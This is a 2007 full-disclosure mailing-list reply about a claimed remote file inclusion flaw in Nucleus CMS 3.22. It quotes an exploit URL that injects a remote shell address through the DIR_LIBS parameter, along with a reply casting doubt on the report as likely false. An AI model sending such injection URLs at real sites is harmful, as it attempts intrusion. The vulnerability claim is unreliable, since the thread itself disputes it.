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Message-ID: <985b1a3d0705070939g44e55db5l59f3b5ff1ff298c4@mail.gmail.com>
Date: Mon, 7 May 2007 18:39:19 +0200
From: "Guasconi Vincent" <tyoptyop@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: nucleus 3.22 >> RFI

On 5/6/07, security curmudgeon <jericho@...rition.org> wrote:
> : VENDOR :http://nucleuscms.org/
> : BY : s3rv3r_hack3r (hackerz.ir admin)
> : bug:
> : nucleus3.22/nucleus/plugins/skinfiles/index.php       = include($DIR_LIBS . 'PLUGINADMIN.php');
> : Exloit:
> : http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
>
> I haven't examined the source code to this, but on June 16, 2006,
> gamr-14@...mail.com disclosed RFI vulnerabilities [1] in four Nucleus
> scripts, all with the DIR_LIBS variable as the injection point. This was
> subsequently proven to be a false report as the variable was previously
> set and could not be manipulated by an attacker.
>
> Have you actually tested this, or is this based on a quick grep of the
> source code?

They're like bots now.
They didn't hear you, and you can't stop them.

Try a spam rule.

-- 
Guasconi Vincent
Etudiant.
http://altmylife.blogspot.com

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